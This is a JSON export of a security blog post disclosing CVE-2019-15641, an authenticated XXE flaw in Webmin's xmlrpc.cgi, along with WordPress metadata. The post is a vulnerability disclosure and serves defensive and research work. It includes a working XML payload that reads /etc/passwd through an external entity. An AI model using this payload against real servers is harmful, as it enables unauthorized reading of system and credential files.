{"id":520,"date":"2019-07-30T11:42:34","date_gmt":"2019-07-30T09:42:34","guid":{"rendered":"https:\/\/www.calypt.com\/blog\/?p=520"},"modified":"2019-08-27T11:08:15","modified_gmt":"2019-08-27T09:08:15","slug":"authenticated-xxe-on-webmin","status":"publish","type":"post","link":"https:\/\/www.calypt.com\/blog\/index.php\/authenticated-xxe-on-webmin\/","title":{"rendered":"CVE-2019-15641 &#8211; Authenticated XXE on Webmin <= 1.930"},"content":{"rendered":"\n<figure class=\"wp-block-image\"><img decoding=\"async\" loading=\"lazy\" width=\"600\" height=\"264\" src=\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2019\/08\/2019-07-30-102728_1110x488_scrot-1024x450.png\" alt=\"\" class=\"wp-image-549\"\/><\/figure>\n\n\n\n<h2>Description<\/h2>\n\n\n<p>From <a href=\"http:\/\/www.webmin.com\">http:\/\/www.webmin.com<\/a> :<\/p>\n<blockquote>\n<p style=\"text-align: justify;\">Webmin is a web-based interface for system administration for Unix. Using any modern web browser, you can setup user accounts, Apache, DNS, file sharing and much more. Webmin removes the need to manually edit Unix configuration files like&nbsp;<tt>\/etc\/passwd<\/tt>, and lets you manage a system from the console or remotely. See the&nbsp;<a href=\"http:\/\/www.webmin.com\/standard.html\">standard modules<\/a>&nbsp;page for a list of all the functions built into Webmin.<\/p>\n<\/blockquote>\n<p>By default, endpoint xmlrpc.cgi is enabled with basic auth, but only 3 users can POST data :<\/p>\n<ul>\n<li>root ;<\/li>\n<li>admin ;<\/li>\n<li>sysadm.<\/li>\n<\/ul>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" loading=\"lazy\" width=\"933\" height=\"134\" src=\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2019\/07\/2019-07-30-103811_933x134_scrot.png\" alt=\"\" class=\"wp-image-523\" srcset=\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2019\/07\/2019-07-30-103811_933x134_scrot.png 933w, https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2019\/07\/2019-07-30-103811_933x134_scrot-600x86.png 600w, https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2019\/07\/2019-07-30-103811_933x134_scrot-768x110.png 768w\" sizes=\"(max-width: 933px) 100vw, 933px\" \/><figcaption>User restriction in xmlrpc.cgi<\/figcaption><\/figure>\n\n\n<p>As its name suggests, the service handle XML messages. The Perl <a href=\"https:\/\/metacpan.org\/pod\/XML::Parser\">XML::Parser<\/a> is used, <strong>without preventing the use of entities<\/strong>&nbsp;:<\/p>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" loading=\"lazy\" width=\"639\" height=\"198\" src=\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2019\/07\/2019-07-30-110314_639x198_scrot.png\" alt=\"\" class=\"wp-image-524\" srcset=\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2019\/07\/2019-07-30-110314_639x198_scrot.png 639w, https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2019\/07\/2019-07-30-110314_639x198_scrot-600x186.png 600w\" sizes=\"(max-width: 639px) 100vw, 639px\" \/><figcaption>Parser initialisation in xmlrpc.cgi<\/figcaption><\/figure>\n\n\n\n<h2>Exploitation<\/h2>\n\n\n<p>Because of this permissive parser, a successfully logged attacker can exploit a <a href=\"https:\/\/www.owasp.org\/index.php\/XML_External_Entity_(XXE)_Processing\">XXE<\/a> in order to retrieve local file or discover internal networks with root rights. Simple XXE payloads can be used, for exemple :<\/p>\n\n\n<pre class=\"wp-block-code\"><code>&lt;?xml version=\"1.0\" encoding=\"utf-8\"?>\n&lt;!DOCTYPE methodCall [\n    &lt;!ENTITY file SYSTEM \"file:\/\/\/etc\/passwd\">\n\n]>\n&lt;methodCall>\n&lt;methodName>&file;&lt;\/methodName>\n&lt;\/methodCall><\/code><\/pre>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Description From http:\/\/www.webmin.com : Webmin is a web-based interface for system administration for Unix. Using any modern web browser, you can setup user accounts, Apache, DNS, file sharing and much more. Webmin removes the need to manually edit Unix configuration files like&nbsp;\/etc\/passwd, and lets you manage a system from the console or remotely. See the&nbsp;standard [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_mi_skip_tracking":false},"categories":[1],"tags":[68,70,59,69,73,66],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v16.1.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<link rel=\"canonical\" href=\"https:\/\/www.calypt.com\/blog\/index.php\/authenticated-xxe-on-webmin\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"CVE-2019-15641 - Authenticated XXE on Webmin\" \/>\n<meta property=\"og:description\" content=\"Description From http:\/\/www.webmin.com : Webmin is a web-based interface for system administration for Unix. Using any modern web browser, you can setup user accounts, Apache, DNS, file sharing and much more. Webmin removes the need to manually edit Unix configuration files like&nbsp;\/etc\/passwd, and lets you manage a system from the console or remotely. See the&nbsp;standard [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.calypt.com\/blog\/index.php\/authenticated-xxe-on-webmin\/\" \/>\n<meta property=\"og:site_name\" content=\"Calypt\" \/>\n<meta property=\"article:published_time\" content=\"2019-07-30T09:42:34+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-08-27T09:08:15+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2019\/08\/2019-07-30-102728_1110x488_scrot-1024x450.png\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\">\n\t<meta name=\"twitter:data1\" content=\"1 minute\">\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.calypt.com\/blog\/#website\",\"url\":\"https:\/\/www.calypt.com\/blog\/\",\"name\":\"Calypt\",\"description\":\"Security thoughts\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":\"https:\/\/www.calypt.com\/blog\/?s={search_term_string}\",\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/www.calypt.com\/blog\/index.php\/authenticated-xxe-on-webmin\/#primaryimage\",\"inLanguage\":\"en-US\",\"url\":\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2019\/08\/2019-07-30-102728_1110x488_scrot-1024x450.png\",\"contentUrl\":\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2019\/08\/2019-07-30-102728_1110x488_scrot-1024x450.png\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.calypt.com\/blog\/index.php\/authenticated-xxe-on-webmin\/#webpage\",\"url\":\"https:\/\/www.calypt.com\/blog\/index.php\/authenticated-xxe-on-webmin\/\",\"name\":\"CVE-2019-15641 - Authenticated XXE on Webmin\",\"isPartOf\":{\"@id\":\"https:\/\/www.calypt.com\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.calypt.com\/blog\/index.php\/authenticated-xxe-on-webmin\/#primaryimage\"},\"datePublished\":\"2019-07-30T09:42:34+00:00\",\"dateModified\":\"2019-08-27T09:08:15+00:00\",\"author\":{\"@id\":\"https:\/\/www.calypt.com\/blog\/#\/schema\/person\/b39592c4058c8985f373832ef96a7cf6\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.calypt.com\/blog\/index.php\/authenticated-xxe-on-webmin\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.calypt.com\/blog\/index.php\/authenticated-xxe-on-webmin\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.calypt.com\/blog\/index.php\/authenticated-xxe-on-webmin\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"item\":{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.calypt.com\/blog\/\",\"url\":\"https:\/\/www.calypt.com\/blog\/\",\"name\":\"Home\"}},{\"@type\":\"ListItem\",\"position\":2,\"item\":{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.calypt.com\/blog\/index.php\/authenticated-xxe-on-webmin\/\",\"url\":\"https:\/\/www.calypt.com\/blog\/index.php\/authenticated-xxe-on-webmin\/\",\"name\":\"CVE-2019-15641 &#8211; Authenticated XXE on Webmin &lt;= 1.930\"}}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.calypt.com\/blog\/#\/schema\/person\/b39592c4058c8985f373832ef96a7cf6\",\"name\":\"Lo\\u00efc\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/www.calypt.com\/blog\/#personlogo\",\"inLanguage\":\"en-US\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/3c9955a661ca1f761736f9a7f32772c3?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/3c9955a661ca1f761736f9a7f32772c3?s=96&d=mm&r=g\",\"caption\":\"Lo\\u00efc\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","_links":{"self":[{"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/posts\/520"}],"collection":[{"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/comments?post=520"}],"version-history":[{"count":11,"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/posts\/520\/revisions"}],"predecessor-version":[{"id":556,"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/posts\/520\/revisions\/556"}],"wp:attachment":[{"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/media?parent=520"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/categories?post=520"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/tags?post=520"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}